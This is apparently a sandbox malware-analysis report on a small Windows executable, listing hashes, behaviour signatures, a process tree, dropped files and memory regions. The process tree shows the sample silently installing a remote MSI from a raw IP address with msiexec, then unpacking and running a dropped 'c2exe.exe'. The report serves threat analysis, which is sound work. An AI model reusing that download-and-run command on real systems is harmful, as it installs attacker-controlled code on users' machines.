Overview

overview

7

Static

static

3

b4661adcd4...81.exe

windows7-x64

1

b4661adcd4...81.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    153s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2024 01:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b4661adcd4f1a037346037efa829293b00d976c56bccc683c423e3a93a8da881.exe

  • Size

    25KB

  • MD5

    0446fd1ab00e877ee83132179991399f

  • SHA1

    b5aa6b4e37a9ae8737968940566db92ce10f15d2

  • SHA256

    b4661adcd4f1a037346037efa829293b00d976c56bccc683c423e3a93a8da881

  • SHA512

    f6a5aaa24535f519fe5f620d332bcfa963d246f31ab02420db5e5a8e46bcd255d4d9e57416c2f703061145e4199ef8f52e0867423a3adc581dc0cb4abf5b4865

  • SSDEEP

    768:QEHP8+0Vfgno6zSKXqyfM41v1lbVxfgm3HrdA:QEHP8+01gVRzfX3y

Score
7/10
discovery

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4661adcd4f1a037346037efa829293b00d976c56bccc683c423e3a93a8da881.exe
    "C:\Users\Admin\AppData\Local\Temp\b4661adcd4f1a037346037efa829293b00d976c56bccc683c423e3a93a8da881.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4284
    • C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /quiet /i http://3.141.55.131:8000/c2exe.msi
      2⤵
      • Use of msiexec (install) with remote resource
      • Suspicious use of AdjustPrivilegeToken
      PID:2348
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 876DF1CB9605DF26E73B011D58787A9D
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:892
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        PID:4312
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        PID:4936
      • C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\files\c2exe.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\files\c2exe.exe"
        3⤵
        • Executes dropped EXE
        PID:2260
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:4740

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\files.cab
      Filesize

      6KB

      MD5

      f48a85de44fbab2c246fae7ac3c2e079

      SHA1

      6ae186f30e2d1ffbda51daf5385dd5323daaf8b0

      SHA256

      433894591dde3ef00e6b59f13c5106574d2920c5bde0c82567331305b2607127

      SHA512

      4adf930db3f3eeb81132a0223c80bd7c066c279258aeeed88e300d38b3e8cdf1db9d643c9a60ae164a4b6e1892e6a389b0efcd3cccbb2c93b9bf0d061207dee3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\files\c2exe.exe
      Filesize

      6KB

      MD5

      2f4531484ff7ac43f50304a421d52d8a

      SHA1

      237404f24027658f4b7c4b59f4b6342b7694d141

      SHA256

      1ef99f635530b86c85c4d3a3e2bd382e9ca61ac6b23ef1bfaf141933107aad89

      SHA512

      967b93e18ef39d2138d8123e110bbb61114fbf7238eff53d9888c527dbdddd1e643224942dfd29d9a8448ffb857f5c4a2319118d05dcdbb656d1556968c930d1

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\msiwrapper.ini
      Filesize

      1KB

      MD5

      9c667dc0794c87808bc48e83028f4ea8

      SHA1

      e192e548925de4adb328468e4382daeb0a05b98f

      SHA256

      9184897d059bd20b9060d771251de7023ac0224f294af3bbd4908e50923c24c8

      SHA512

      a47080605340831e88cbe0ce7deb259d6e880991b32c42986416a70033dd416f5a6a52decddc2c6b909a2ae6f0dce21c8dbb73d280b6725d51b1293af032726b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tivtqjye.aj1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Windows\Installer\MSI3B8D.tmp
      Filesize

      252KB

      MD5

      d457ede045732a5c1e1895304d1dc560

      SHA1

      658c7ccbb5164044da088f5c3e447de059571e20

      SHA256

      2cf84ed623f2680e8162d7499b9bdab785dad88bfb6fc012717f53c8dfae3dde

      SHA512

      6da954934dcbabda052ffe6324880145e8e5334a077d1be0e865f6679e0abd6e207712d37f1f6ce6b79073d18dacaa60d56cc5bf534fe8f66138a29e8fba2f4c

      Download Submit

    • C:\Windows\Installer\MSI585D.tmp
      Filesize

      208KB

      MD5

      0c8921bbcc37c6efd34faf44cf3b0cb5

      SHA1

      dcfa71246157edcd09eecaf9d4c5e360b24b3e49

      SHA256

      fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

      SHA512

      ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

      Download Submit

    • memory/2260-86-0x0000000000A60000-0x0000000000A68000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4284-13-0x00007FFFD6DE0000-0x00007FFFD78A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4284-24-0x00007FFFD6DE3000-0x00007FFFD6DE5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4284-25-0x00007FFFD6DE0000-0x00007FFFD78A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4284-0-0x00007FFFD6DE3000-0x00007FFFD6DE5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4284-12-0x00007FFFD6DE0000-0x00007FFFD78A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4284-76-0x00007FFFD6DE0000-0x00007FFFD78A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4284-11-0x000000001BBA0000-0x000000001BBC2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4284-1-0x0000000000F50000-0x0000000000F5C000-memory.dmp

      Filesize

      48KB

      Download